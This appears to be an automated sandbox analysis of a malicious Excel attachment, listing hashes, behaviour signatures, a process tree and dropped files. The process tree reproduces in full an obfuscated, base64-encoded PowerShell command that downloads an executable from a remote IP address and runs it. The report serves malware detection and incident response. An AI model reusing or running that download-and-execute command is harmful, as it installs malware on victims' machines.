Analysis

  • max time kernel: 120s
  • max time network: 126s
  • platform: windows7_x64
  • resource: win7-20240221-en
  • resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted: 07-07-2024 01:00

General

  • Target: inquiry MTO-PILZ-TF-8531.xls
  • Size: 430KB
  • MD5: 996967065e5478555d9c4bf0838f6fd0
  • SHA1: 8c07156945c2c55d61df66ff9ee0f2d6c598a6a4
  • SHA256: 158644533c0c9683e8c8da4cfafd48eb05164ae25bb0e5f433ed23aec8a7464e
  • SHA512: 39c11818eae917356cd178476c2b55c67ca209246e11f0115999ae50e5f7fc6adc1d375ff974ef8020ccb25a1ad474a094f20625db4f741c902fdcf182e1e18e
  • SSDEEP: 12288:U6NCL1OGQpozwjTqCfgn+/doG59yeXWWeIgpWpKhNSB:U6NC5rFWWCfgnkdoG59ye5cIOS

Score
10/10

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\inquiry MTO-PILZ-TF-8531.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\SysWOW64\ktmutil.exe
      "C:\Windows\SysWOW64\ktmutil.exe"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2284
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C poWerShelL -eX BYpaSS -nOP -w 1 -c deVIceCRedentIaLdePLOYMENt.exE ; ieX($(iex('[SySTEm.tExt.encODing]'+[ChAR]0x3a+[Char]0X3A+'UtF8.GetSTRing([SYsTEM.CoNVERT]'+[chAr]58+[CHAr]58+'FROMBASe64StRiNG('+[CHar]34+'JFhrRFFCQTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVyZGVmSW5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVBYmJvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWRDb1hXYlUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWm9mY0ZJLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQW9KKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9NdENoRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5YRncgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYa0RRQkE0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC41LjE3LzY2MDU1L2lnY2N1LmV4ZSIsIiRFTnY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U3RhcnQtU0xFZXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaGtjbWQuZXhlIg=='+[CHar]0X22+'))')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWerShelL -eX BYpaSS -nOP -w 1 -c deVIceCRedentIaLdePLOYMENt.exE ; ieX($(iex('[SySTEm.tExt.encODing]'+[ChAR]0x3a+[Char]0X3A+'UtF8.GetSTRing([SYsTEM.CoNVERT]'+[chAr]58+[CHAr]58+'FROMBASe64StRiNG('+[CHar]34+'JFhrRFFCQTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVyZGVmSW5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVBYmJvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWRDb1hXYlUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWm9mY0ZJLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQW9KKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9NdENoRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5YRncgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYa0RRQkE0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC41LjE3LzY2MDU1L2lnY2N1LmV4ZSIsIiRFTnY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U3RhcnQtU0xFZXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaGtjbWQuZXhlIg=='+[CHar]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vcqikgni.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1128
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6AF3.tmp"
            5⤵
              PID:820
          • C:\Users\Admin\AppData\Roaming\hkcmd.exe
            "C:\Users\Admin\AppData\Roaming\hkcmd.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2104
            • C:\Windows\SysWOW64\svchost.exe
              "C:\Users\Admin\AppData\Roaming\hkcmd.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:1596

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\66055[1].hta
    Filesize: 8KB
    MD5: c2d38ffc92cb365472534e51ec747405
    SHA1: 7e92d52683b46eec235e66f18c1b414fc75643d6
    SHA256: 82eeb1ac4df3cab27f9ea5b2a09b7c9993090bc33e9b0b8d9ae34673a0b3cd95
    SHA512: a5db53376ba44aa7e9b4a5f00c6061f4a6dd0ff9a73e46f6801cc9d79d98b305bc4a9ff6b7f4b622a77d9f9355705dd1c154266fd264f866c2fcdc2d101e1ba0

  • C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp
    Filesize: 1KB
    MD5: 22a7da98acc402b67f5f5836f1cc08a5
    SHA1: 51cf504a969959f6ce2ae8090dabaae4572f97c2
    SHA256: f624411e55f26055f84e8db54ac20fe0b8a666a458bfc2602a24ef139ca429eb
    SHA512: 34639d4de7299acbd44217db185c8e4dbb0e68584820519d978f8be4a83d25a6fa6948c6d428c36573f4f8adbd50c75642024980aaa78ceee1805771fbba89c8

  • C:\Users\Admin\AppData\Local\Temp\pensum
    Filesize: 264KB
    MD5: 23d91bc6f8608c8d788890539b6127f3
    SHA1: 233692af0c89d215fb032d35c33190d19a581985
    SHA256: 5cde9e3dbfa9f051254881198aac9e3d103fde3e63780ed53f6a53a12c0e3e8b
    SHA512: 421d7eecce0d5b93067534ebe7c8108ffcbe5bc4bf8342d635879a4407479f10b52b4a09631ec6b970a1e5cf64f1b63c2c827ad19666c46c6ad7aac352a48c5c

  • C:\Users\Admin\AppData\Local\Temp\vcqikgni.dll
    Filesize: 3KB
    MD5: 4a7b916bb3433d9a3ee0b65b461cabe8
    SHA1: abaa382b63c36c0bf70e2dcccf0bfd1c4e48db97
    SHA256: d07fdb7cb430c358506b90d6c60927f315db5ff2974da66825842c8fc95864c7
    SHA512: 46bc2055a4ec8f2d483c148fcee31e217de32e4b0b9fc79efbc23ef96593532f4f36f4ca089833ed6ab2ed6aa3d01ca73a66de0b562e25a4faa0a18c8518c3e4

  • C:\Users\Admin\AppData\Local\Temp\vcqikgni.pdb
    Filesize: 7KB
    MD5: 47acdbd0f835508f9b9da38f6593b2a9
    SHA1: 6eb8b3c00c96e47e5fef2a098ed7ef0a392eee88
    SHA256: 7ce0bde55e2e9111a3fc4a9e5e115112d3347a6a1f47b917b7b35ad6d17ea807
    SHA512: 52de362ccd4c85d0d4b795d3c9e2f167d15264e38c87aee55158b3134f5f6d51ab2e2ac30f1c5e6b2c79d466c46f1077cad9ea2a94f48d5bc82e5c4c586cd28e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC6AF3.tmp
    Filesize: 652B
    MD5: 2b03dd1dd8f23c22460891a85aa228e5
    SHA1: 6bd0a432339bbb7f3b78788b01b723144ed80c50
    SHA256: e44e24242b9724eae0015ff1e4b185f7e932e569c3c272a9d37bb8ad07f77acd
    SHA512: 08c3a1ded9473d9503551300a331ee5deae5216c4bead6807ce205ab5a728cd430e9e266a26e27beea7fd0864464a4d2fab01146f14bef3e1d9c28ac688530af

  • \??\c:\Users\Admin\AppData\Local\Temp\vcqikgni.0.cs
    Filesize: 443B
    MD5: 62428a5441b9e6016ca35fb63a889ce1
    SHA1: cc4bcfec8130f8539645c80410d6b72403b46bb8
    SHA256: 3624c195a637f25ff4b397f6e3e0f9395bab69e64f6c65d33f6e0f20f64d2ce9
    SHA512: 72f5b42f94057bc07f4171739300d058972a57c54fa05b7fe95015a00a17c75fff036227e6c9525ac2d757eff4f02c99a8eb62ba2a8eb27ed6059e1734971624

  • \??\c:\Users\Admin\AppData\Local\Temp\vcqikgni.cmdline
    Filesize: 309B
    MD5: c686c365f3fd946e07d0248bc615c4c3
    SHA1: 28c807ea0861100ffc1a2e4f36e47f2fb530dc92
    SHA256: 8a966642b59a167a2baa5aa94ccbb9cf2abad295e4c5b999d5ae3c6f741b1a9a
    SHA512: 2e233f4a8211417872c6ea9e917f1c638da504968aedc48800e97ed455e63b7cc6c2736a5f5c0a08379b96843cdddcbee4dec69ea30c807b2a26277df019bbb0

  • \Users\Admin\AppData\Roaming\hkcmd.exe
    Filesize: 1.1MB
    MD5: c3ebea7cd7e96887d0fffff22bf00101
    SHA1: 1e2a2b28d96799f978d86cfb14744e92aeb18220
    SHA256: b0e6a88e88c1285509436037b3a3f41f4736460bdd64db7086e032fa2cee4832
    SHA512: 310c12aff1dd0b13f1a9a3897969bf9b90cdb950660efc27a97093f979dc9c06563a9d596b4511225cfe924311fdbf5233b48dd2bcddfbcb44642ee9eb22ebc8

  • memory/1596-49-0x0000000000400000-0x0000000000442000-memory.dmp (Filesize: 264KB)
  • memory/1724-50-0x00000000721BD000-0x00000000721C8000-memory.dmp (Filesize: 44KB)
  • memory/1724-1-0x00000000721BD000-0x00000000721C8000-memory.dmp (Filesize: 44KB)
  • memory/1724-5-0x0000000002240000-0x0000000002242000-memory.dmp (Filesize: 8KB)
  • memory/1724-0-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/1724-53-0x0000000008A00000-0x0000000008AF9000-memory.dmp (Filesize: 996KB)
  • memory/1724-61-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/1724-66-0x0000000008A00000-0x0000000008AF9000-memory.dmp (Filesize: 996KB)
  • memory/1724-67-0x00000000721BD000-0x00000000721C8000-memory.dmp (Filesize: 44KB)
  • memory/2284-51-0x0000000000080000-0x00000000000BF000-memory.dmp (Filesize: 252KB)
  • memory/2284-52-0x0000000000080000-0x00000000000BF000-memory.dmp (Filesize: 252KB)
  • memory/2284-58-0x0000000000080000-0x00000000000BF000-memory.dmp (Filesize: 252KB)
  • memory/2956-4-0x0000000002860000-0x0000000002862000-memory.dmp (Filesize: 8KB)